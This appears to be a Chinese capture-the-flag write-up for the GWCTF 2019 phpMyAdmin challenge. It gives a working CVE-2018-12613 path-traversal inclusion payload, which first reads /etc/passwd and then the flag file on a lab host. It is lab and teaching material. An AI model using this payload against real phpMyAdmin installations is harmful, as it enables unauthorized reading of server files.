[GWCTF 2019]我有一个数据库

御剑扫一波

http://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/robots.txt
http://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/phpmyadmin/
http://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/phpmyadmin/tbl_create.php
http://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/phpmyadmin/config.inc.php

robots.txt里面提示了phpinfo.php
在这里插入图片描述
访问了一下没啥东西。

再访问了一下phpmyadmin

好家伙，直接进后台，密码都没的。

查看版本号

查看了一下服务器配置：
在这里插入图片描述
这里涉及到一个cve漏洞：
phpMyadmin(CVE-2018-12613)后台任意文件包含漏洞

直接打payload

?target=db_datadict.php%253f/../../../../../../../../etc/passwd

在这题的payload：

http://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/phpmyadmin/?target=db_datadict.php%253f/../../../../../../../../flag

在这里插入图片描述

相关阅读:
数据库事务隔离级别+Spring 声明性事务隔离级别
（面试题）如何查找Oracle数据库中的重复记录
Spring提供的线程池支持--百度文库
(面试题)输出下列程序结果（考察字符串与其他类型+连接）
（面试）有两个木桶，一个3斤，一个5斤，水无限，要怎么样得到精确地4斤水
（面试）涉及到继承和类加载
（面试题）用折半查找法在一组整形数组中查找某个数据
（面试）写出下面switch语句的输出结果
HTML 鼠标坐标和元素坐标
HTML5 元素属性介绍

原文地址：https://www.cnblogs.com/shenjuxian/p/13927799.html